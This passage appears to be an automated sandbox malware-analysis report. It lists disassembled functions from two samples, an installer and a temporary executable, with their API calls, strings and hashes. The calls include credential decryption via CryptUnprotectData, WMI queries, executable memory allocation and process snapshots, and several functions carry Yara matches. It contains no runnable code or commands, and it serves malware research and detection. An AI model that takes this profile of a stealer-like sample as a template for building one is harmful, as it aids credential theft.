SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

ios_base::failbit set, xrefs: 0040C510
F(@, xrefs: 0040C547

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

MOC, xrefs: 004406B4
RCC, xrefs: 004406C3

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
__CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA

Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D

Strings

Access violation - no RTTI data!, xrefs: 00428D7A

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

~B, xrefs: 00423827
zB, xrefs: 00423821

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 0096B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00942AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00942AAD,00000000), ref: 0096B187
GetLastError.KERNEL32 ref: 0096B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00942AAD,00000000), ref: 0096B1F0

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: 6a6d59bed4db325f0a58273d489c1f4878d5ab0faf870dba3729d32571fb116a
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 43410431604216AFCF218F64CC64BBE7BE8EF52710F254169E969E71A1FB308D81CB60

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Analysis Process: C7B4.tmp.exePID: 3032, Parent PID: 6664COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	17.2%
Signature Coverage:	29.1%
Total number of Nodes:	151
Total number of Limit Nodes:	9

Executed Functions

Function 00437DF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 640
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
SysAllocString.OLEAUT32()\"^), ref: 004380C3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
SysAllocString.OLEAUT32()\"^), ref: 0043817E
SysAllocString.OLEAUT32()\"^), ref: 00438238
VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
VariantClear.OLEAUT32(?), ref: 004383F9
SysFreeString.OLEAUT32(?), ref: 0043841D
SysFreeString.OLEAUT32(?), ref: 00438423
SysFreeString.OLEAUT32(00000000), ref: 00438430
GetVolumeInformationW.KERNEL32(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468

Strings

.H4J, xrefs: 0043805A
P%R, xrefs: 0043804A
O@, xrefs: 0043806A
)\"^, xrefs: 004380BE, 004380C2, 0043817D, 00438237, 0043845B
pq, xrefs: 004382E2

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: P%R$)\"^$.H4J$O@$pq
API String ID: 2573436264-1397720406
Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF

Strings

NDNK, xrefs: 00415D85
~, xrefs: 0041596E
oA&C, xrefs: 00415CE6
<I2K, xrefs: 00415C2B
8MNO, xrefs: 00415C36
RXA, xrefs: 00415842
X, xrefs: 00415DD2

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 834300711-3328159043
Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 00409580 Relevance: 9.2, Strings: 7, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tiec, xrefs: 00409963
r, xrefs: 004095F4
#4<7, xrefs: 00409772
\, xrefs: 0040978A
+8=>, xrefs: 00409782
PK, xrefs: 004099E1
8D18AE3C672E6F10AC8923850305D13E, xrefs: 00409642

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$8D18AE3C672E6F10AC8923850305D13E$PK$Tiec$\$r
API String ID: 0-3722211771
Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0043C790

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

Function 00422190 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

Function 0097003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0097024D

Strings

kernel32.dll, xrefs: 0097008F, 00970095
cess, xrefs: 0097018D

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: c29fec39ee57a83d17bac452df4c229d9a0e11f44a1bfaf8c6ba5dc7d6309009
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B9526875A00229DFDB64CF68C985BA8BBB1BF49304F1480D9E94DAB351DB30AE85DF14

Function 00A5172E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A51756
Module32First.KERNEL32(00000000,00000224), ref: 00A51776

Memory Dump Source

Source File: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a50000_C7B4.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: e00ae9c1b21c4c89d63ced3a06d93ca4e08ba425ad809ea4f206d2f949670611
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 71F06235600710BBD7202BF9998DBBE76ECBF4D726F500628EA52914C0DAB0EC494A61

Function 00970E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00000400,?,?,00970223,?,?), ref: 00970E19
SetErrorMode.KERNEL32(00000000,?,?,00970223,?,?), ref: 00970E1E

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 727fe679e50d8e356a00f4c692adc69221b0a20b8b0b0ea56d2711bf74fe92b4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 84D01232245228B7DB002A94DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

Function 00A513ED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A5143E

Memory Dump Source

Source File: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a50000_C7B4.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: f46b7cbe7da1d68e8e59bcbba79b47f0415e30de43beb7bd7ebc94093f658034
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 63112B79A00208EFDB01DF98CA85E99BBF5AF08351F158094F9489B362D371EA50DF80

Non-executed Functions

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

FOEH, xrefs: 0042771E
NO, xrefs: 00427361
EG, xrefs: 0042740B
l+X-, xrefs: 004272FE
g#X%, xrefs: 004272E8
bweM, xrefs: 004276F0
w?n!, xrefs: 004272DD
>C7E, xrefs: 00427340
